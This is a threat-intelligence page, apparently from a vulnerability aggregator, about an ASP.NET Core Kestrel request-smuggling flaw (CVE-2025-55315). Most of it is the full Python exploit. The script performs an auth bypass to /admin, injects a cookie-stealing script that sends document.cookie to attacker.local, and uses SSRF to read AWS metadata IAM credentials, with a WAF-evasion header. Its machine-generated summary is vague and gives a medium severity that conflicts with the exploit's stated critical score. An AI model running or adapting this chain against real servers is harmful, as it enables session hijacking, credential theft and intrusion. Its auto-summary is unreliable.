ASP.net 8.0.10 - Bypass
ASP.net 8.0.10 - Bypass
AI Analysis
Technical Summary
This threat involves an exploit against ASP.net version 8.0.10 described as a 'bypass'. The exact nature of the bypass is not detailed in the available information. Exploit code is publicly available in Python, indicating potential for use by attackers. No specific affected subversions or components are listed, and no vendor advisory or patch information is provided.
Potential Impact
The impact is classified as medium severity based on the provided data. Without detailed technical or vendor information, the precise consequences of the bypass cannot be fully assessed. The presence of exploit code suggests a potential risk of unauthorized access or evasion of security controls in ASP.net 8.0.10 environments.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until official fixes or mitigations are released, organizations using ASP.net 8.0.10 should monitor vendor communications and consider risk-based controls to limit exposure.
Indicators of Compromise
- exploit-code: # Exploit Title: ASP.net 8.0.10 - Bypass # Date: 2025-11-03 # Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # CVE: CVE-2025-55315 # Tested on: .NET Kestrel (unpatched) - ASP.NET Core on localhost (lab environment) # Platform: remote # Type: webapps # Attack Vector: Network (HTTP/HTTPS) - Remote exploitation via malformed chunked encoding # CVSS: 9.8 (Critical) - Estimated: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H # # Description: # This exploit demonstrates a critical HTTP Request Smuggling vulnerability in # unpatched versions of .NET Kestrel due to improper handling of malformed # chunk extensions (LF-only line endings). The script performs: # 1. Automatic fingerprinting to detect vulnerable instances # 2. Auth bypass to access restricted endpoints (/admin) # 3. Session hijacking via response queue poisoning (JS cookie stealer) # 4. SSRF to internal metadata services (e.g., AWS 169.254.169.254) # Includes WAF bypass using 'chUnKEd' header and generates detailed JSON reports. # # The vulnerability allows full remote compromise: authentication bypass, # session theft, and internal network access — all from a single HTTP request. # # Patched in .NET 9.0.1 / 8.0.10+ (October 2025). # # IMPORTANT SAFETY : # - DO NOT RUN AGAINST PRODUCTION OR THIRD-PARTY SYSTEMS. # - Use only in isolated environments (VM, Docker with --network none). # - All payloads are educational and non-destructive by design. # - Modify payloads only within your controlled lab. # # References: # - CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-55315 # - Microsoft Security Advisory (hypothetical): https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55315 from __future__ import annotations import socket import ssl import time import argparse import json import os from typing import Tuple, Optional DEFAULT_TIMEOUT = 3.0 READ_CHUNK = 4096 REPORT_DIR = "kestrel_desync_reports" os.makedirs(REPORT_DIR, exist_ok=True) # ------------------ Utilities ------------------ def now_iso() -> str: return time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime()) def hexdump(b: bytes, maxlen: int = 200) -> str: shown = b[:maxlen] hexed = ' '.join(f"{x:02x}" for x in shown) return f"{hexed} ..." if len(b) > maxlen else hexed def save_file(path: str, data: bytes) -> None: try: with open(path, 'wb') as f: f.write(data) print(f"[+] Saved: {path}") except Exception as e: print(f"[!] Save failed: {e}") # ------------------ Networking ------------------ def send_http(host: str, port: int, data: bytes, use_tls: bool = False) -> Tuple[Optional[bytes], bool]: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(DEFAULT_TIMEOUT) try: if use_tls: ctx = ssl.create_default_context() s = ctx.wrap_socket(s, server_hostname=host) s.connect((host, port)) s.sendall(data) parts = [] while True: try: chunk = s.recv(READ_CHUNK) if not chunk: break parts.append(chunk) except socket.timeout: break resp = b''.join(parts) s.settimeout(0.2) try: s.recv(1) open_flag = True except: open_flag = False s.close() return resp, open_flag except Exception: return None, False # ------------------ Request Builder (WAF Bypass) ------------------ def build_chunked(method: str, path: str, body: bytes, extra_headers: list = None) -> bytes: headers = [ f"{method} {path} HTTP/1.1", "Host: localhost", "Transfer-Encoding: chUnKEd", # WAF Bypass "Content-Type: text/plain", ] if extra_headers: headers.extend(extra_headers) headers.extend(["", ""]) return "\r\n".join(headers).encode() + body # ------------------ Fingerprint ------------------ def fingerprint(host: str, port: int, use_tls: bool) -> Tuple[bool, Optional[bytes]]: print(f"[*] Fingerprinting {host}:{port}...") payload = b"1\nx\n0\n\n" req = build_chunked("POST", "/", payload) resp, _ = send_http(host, port, req, use_tls) if resp and b"400" not in resp.split(b'\r\n', 1)[0]: print(f"[!] VULNERABLE: Accepted LF-only chunk!") return True, resp print(f"[+] Patched: 400 Bad Request") return False, resp # ------------------ Exploit Chain ------------------ def exploit_chain(host: str, port: int, use_tls: bool): results = [] # 1. Auth Bypass print(f"[!] 1. Auth Bypass → /admin") smug_admin = b"0\r\n\r\nGET /admin HTTP/1.1\r\nHost: localhost\r\nX-Bypass: yes\r\n\r\n" req1 = build_chunked("POST", "/", b"1;ext\nx\n" + smug_admin, ["Content-Length: 50"]) resp1, _ = send_http(host, port, req1, use_tls) if resp1 and (b"admin" in resp1.lower() or b"dashboard" in resp1.lower()): results.append("Auth Bypass: SUCCESS") save_file(os.path.join(REPORT_DIR, f"admin_page_{host}_{port}.html"), resp1) else: results.append("Auth Bypass: FAILED") # 2. Session Hijacking print(f"[!] 2. Session Hijacking → JS Stealer") js_payload = ( b"0\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n" b"Content-Type: text/html\r\nContent-Length: 120\r\n\r\n" b"<script>fetch('http://attacker.local/steal?c='+document.cookie)</script>" ) req2 = build_chunked("POST", "/", b"1;ext\nx\n" + js_payload) send_http(host, port, req2, use_tls) results.append("Session Hijack: INJECTED") # 3. SSRF print(f"[!] 3. SSRF → AWS Metadata") ssrf = b"0\r\n\r\nGET http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: localhost\r\n\r\n" req3 = build_chunked("POST", "/", b"1;ext\nx\n" + ssrf) resp3, _ = send_http(host, port, req3, use_tls) if resp3 and b"role" in resp3: results.append("SSRF: SUCCESS") save_file(os.path.join(REPORT_DIR, f"ssrf_metadata_{host}_{port}.txt"), resp3) else: results.append("SSRF: FAILED") return results # ------------------ Reporting ------------------ def save_json_report(host: str, port: int, use_tls: bool, results: list): report = { "target": f"{host}:{port}", "tls": use_tls, "timestamp": now_iso(), "cve": "CVE-2025-55315", "status": "VULNERABLE", "waf_bypass": "chUnKEd", "exploits": results } path = os.path.join(REPORT_DIR, f"REPORT_{host}_{port}_{int(time.time())}.json") with open(path, 'w', encoding='utf-8') as f: json.dump(report, f, indent=2) print(f"[+] JSON Report: {path}") # ------------------ CLI ------------------ def main(): parser = argparse.ArgumentParser() parser.add_argument("target", help="host:port or host:port:tls") args = parser.parse_args() parts = args.target.split(":") host = parts[0] port = int(parts[1]) use_tls = len(parts) > 2 and parts[2].lower() in ("tls", "1") print(f"\n=== Kestrel Desync Full Chain ===\nTarget: {host}:{port} (TLS: {use_tls})\n") is_vuln, _ = fingerprint(host, port, use_tls) if not is_vuln: print("[+] Target is patched. Exiting.") return results = exploit_chain(host, port, use_tls) save_json_report(host, port, use_tls, results) print(f"\n[+] Exploitation chain completed!") print(f"[+] All files in: {REPORT_DIR}") if __name__ == "__main__": main()
ASP.net 8.0.10 - Bypass
Description
ASP.net 8.0.10 - Bypass
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This threat involves an exploit against ASP.net version 8.0.10 described as a 'bypass'. The exact nature of the bypass is not detailed in the available information. Exploit code is publicly available in Python, indicating potential for use by attackers. No specific affected subversions or components are listed, and no vendor advisory or patch information is provided.
Potential Impact
The impact is classified as medium severity based on the provided data. Without detailed technical or vendor information, the precise consequences of the bypass cannot be fully assessed. The presence of exploit code suggests a potential risk of unauthorized access or evasion of security controls in ASP.net 8.0.10 environments.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until official fixes or mitigations are released, organizations using ASP.net 8.0.10 should monitor vendor communications and consider risk-based controls to limit exposure.
Technical Details
- Edb Id
- 52492
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for ASP.net 8.0.10 - Bypass
# Exploit Title: ASP.net 8.0.10 - Bypass # Date: 2025-11-03 # Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # CVE: CVE-2025-55315 # Tested on: .NET Kestrel (unpatched) - ASP.NET Core on localhost (lab environment) # Platform: remote # Type: webapps # Attack Vector: Network (HTTP/HTTPS) - Remote exploitation via malformed chunked encoding # CVSS: 9.8 (Critical) - Estimated: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H # #... (7077 more characters)
Threat ID: 69d4e432aaed68159a0d458a
Added to database: 4/7/2026, 11:02:10 AM
Last enriched: 4/17/2026, 2:44:26 PM
Last updated: 5/22/2026, 10:18:27 PM
Views: 64
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.